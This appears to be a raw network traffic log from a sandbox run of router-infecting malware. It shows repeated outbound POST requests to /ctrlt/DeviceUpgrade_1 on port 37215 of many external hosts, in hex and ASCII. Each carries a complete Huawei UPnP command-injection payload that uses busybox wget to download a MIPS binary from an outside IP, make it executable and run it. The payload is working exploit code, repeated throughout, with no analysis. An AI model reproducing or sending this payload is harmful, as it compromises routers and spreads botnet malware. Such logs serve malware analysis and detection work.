39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            203192.168.2.1350096156.175.16.4537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.037729979 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            204192.168.2.1351092197.21.231.6837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.038460970 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            205192.168.2.134664241.205.70.4437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.039202929 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            206192.168.2.1338456156.139.95.10037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.039932013 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            207192.168.2.134810241.41.194.3837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.131221056 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            208192.168.2.134329241.102.185.16037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.132023096 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            209192.168.2.134068641.219.156.11237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.132777929 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            210192.168.2.133525241.136.197.13837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.133538008 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            211192.168.2.1345440197.110.124.7037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.134300947 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            212192.168.2.1344468156.134.62.11737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.160015106 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            213192.168.2.1357854156.211.139.23437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.160742998 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
